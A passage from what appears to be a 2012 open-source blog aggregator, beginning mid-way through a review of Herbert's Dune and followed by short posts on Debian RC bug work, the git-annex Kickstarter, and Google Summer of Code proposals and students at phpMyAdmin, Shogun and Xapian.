messiah figure into a fast-paced, sweeping epic with a thoroughly satisfying conclusion. I think they do make it a flawed masterpiece, but it's still one of those SF novels that everyone should read at least once. Sadly, it's also a masterpiece that I think has suffered from its own success in the form of sequels, prequels, and a ton of supporting material. This is one of the problems that truly excellent world building can lead to. Human history is fractal: any specific detail can be examined in more depth and will usually lead (provided that information is available at all) to even more fascinating detail. The best world building conveys that impression of depth. That's what Herbert achieves here with hints, notes, and asides: the sense that galactic history is a vast ediface with the same fractal complexity as real human history. It makes for a compelling background, but it also inspires people to dig into that background and flesh out all of the details the way that we do with human history. But this doesn't actually work; invented history created by one person simply cannot be fractal in the same way. Human history is endlessly complex because it was generated by the complex interactions of many people. Invented history is an illusion that hints at complexity by building the same surface, but one mind, or even a small number of minds, cannot generate the same depth. The result is that if one digs too deep, one removes that convincing surface and ends up with a mundane, simplistic, and unsatisfyingly fake set of events. I think that's what's happened with all of the supporting material that's been written around Dune since its original publication. Dune is of a piece, a single story that's deeply enjoyable on its own terms and leaves the reader with a satisfying impression of complexity. The systemic excavation of that complexity lessens it and reveals too much of the illusion. Yes, I want to know more about the Butlerian Jihad, but that's the point: the wanting is the sign of succesful crafting of imagined history. Reading the definitive account is more likely to leave me unsatisfied than to lead to the recursive curiosity that human history can create. The sequels to Dune written by Herbert himself are, for me, another matter. Some reviewers level the same criticism at them: that Herbert dives too far into background best left unexplored. But they have the advantage of moving forward, telling more of the story set off by Paul, and the end of Dune is a clear setup for a sequel. One of Paul's goals throughout most of the book has been left unaccomplished. I don't think Herbert dove too deep into his creation; rather, my problem with his sequels (all of which I've read, although it's been some years now) is that he took the story in a direction that I actively disliked and found painful to read. Regardless, the general consensus is that the sequels aren't as good as the original, and while Dune doesn't fully resolve its story, it's complete enough that it's possible to stop here. Stopping is the general recommendation, although I still may re-read and review the sequels at some point. Followed by Dune Messiah. Rating: 8 out of 10

19 August 2012

Gregor Herrmann: RC bugs 2012/33

it's sunday evening again, & again, here comes my report about activities around RC bugs:

11 July 2012

Michal &#268;iha&#345;: GSoC evaluations submitted

Even though I've planned to do this on Monday, it somehow slipped to Wednesday, but I've finally filled in GSoC 2012 evaluations for all students I mentor at phpMyAdmin. Generally all of them perform quite well, but there is always room for improvements :-). The greatest pain every year is filling up evaluations for more students - every each of them starts with same questions for mentor (eg. how many GSoC did you participate in or how much time you spend on GSoC). I know I can copy and paste answers, but still this looks like something not necessary. Also some information is probably already known to Google (eg. in which years I did participate in GSoC).

Filed under: English Phpmyadmin 0 comments Flattr this!

19 June 2012

Joey Hess: I work for The Internet now

I have an interesting problem: How do I shoehorn "hired by The Internet for a full year to work on Free Software" into my resume? Yes, the git-annex Kickstarter went well. :) I had asked for enough to get by for three months. Multiple people thought I should instead work on it for a full year and really do the idea justice. Jason Scott was especially enthusiastic about this idea. So I added new goals and eventually it got there. graph: up and to the right, to 800% funded Don Marti thinks the success of my Kickstarter validates crowdfunding for Free Software. Hard to say; this is not the first Free Software to be funded on Kickstarter. Remember Diaspora? Here's what I think worked to make this a success: I've already put two weeks work into developing the git-annex assistant. I'm blogging about my progress every day on its development blog. The first new feature, a git annex watch command that automatically commits changes to git, will be in the next release of git-annex. I can already tell this is going to be a year of hard work, difficult problems, and great results. Thank you for helping make it happen.

26 April 2012

Soeren Sonnenburg: GSoC2012 Accepted Students

Shogun has received an outstanding 9 slots in this years google summer of code. Thanks to google and the hard work of our mentors ranking and discussing with the applicants - we were able to accept 8 talented students (We had to return one slot back to the pool due to not having enough mentors for all tasks. We indicated that octave gets the slot so lets hope they got it and will spend it well :). Each of the students will work on rather challenging machine learning topics. The accepted topics and the students attacking them with the help of there mentors are We are excited to have them all in the team! Happy hacking!

Olly Betts: Xapian GSoC 2012 Projects

At the end of the previous episode, you may remember our gallant heroes had a pile of 30 proposals to review. We soon spotted one more to mark as invalid (just a paste with our ideas list plus a some biographical details), and another got withdrawn by the student without explanation (but was low quality anyway), so that left us with 28. We had six volunteers for mentoring, and in the initial allocation we received five student slots from Google, but we asked nicely if we could have an extra one, and were lucky enough to get it. Last year we had four students, so that's a 50% increase. Here's those 28, broken down by the project idea:
  • 8 - Weighting Schemes
  • 6 - Learning to Rank
  • 3 - Dynamic Snippets
  • 2 - Lucene Backend
  • 2 - QueryParser improvements
  • 1 - Erlang Bindings
  • 1 - Improve C# and Java bindings
  • 1 - Improve PHP Bindings
  • 1 - Improve Python Bindings
  • 1 - Improving Japanese Support
  • 1 - Node.js Bindings
  • 1 - Postlist encodings
I find it interesting that the most popular three ideas have closer connections to Information Retrieval theory than most - probably these appeal to students who have taken IR courses and already have an interest and some knowledge of the project area. I think we should aim to get more ideas like these on the list in future years. It's worth noting that in several cases students had taken an idea in sufficiently different directions that there wasn't much overlap, so we didn't just pick the best proposal for each project idea to narrow things down. Also, the proposal isn't the only factor - we like to see applicants work on patch, and to interact with us on IRC and/or email. But in the end it happens we ended up with proposals which were all from different ideas - here are those we selected:
My congratulations to the lucky six, and my commiserations to those we weren't able to select. It wasn't an easy selection to make, and we truly appreciate the time you spent writing your proposal, working on patches, and on the rest of the application process. We'd encourage you to remain involved with Xapian, and to apply to us again next year if you're still eligible for GSoC.

9 April 2012

Soeren Sonnenburg: Shogun Student Applications Statistics for Google Summer of Code 2012

A few weeks have passed since SHOGUN has been accepted for Google Summer of Code 2012. Student application deadline was Easter Friday (April 6) and shogun received 48 proposals from 38 students. Some more detailed stats can be found in the figure below. This is a drastic drop compared with last year (about 60 students submitted 70 proposals). However, this drop can easily be explained: To even apply we required a small patch, which is a big hurdle.
  1. One has to get shogun to compile (possibly only easy under debian; for cygwin/MacOSX you have to invest quite some time to even get all of its dependencies).
  2. One has to become familiar with git, github and learn how to issue a pull request.
  3. And finally understand enough of machine learning, shogun's source code to be able to fix a bug or implement some baseline machine learning method
Nevertheless, about a dozen of proposals didn't come with a patch (even though written on the instructions page that this is required) - an easy reject. In the end the quality of proposals increased a lot and we have many very strong candidates this year. Now we will have to wait to see how many slots we will receive before we can finally start the fun :-)

8 April 2012

Gregor Herrmann: RC bugs 2012/14

good news: it looks like more & more people are working on RC bugs & doing NMUs. here are my contributions from this week:

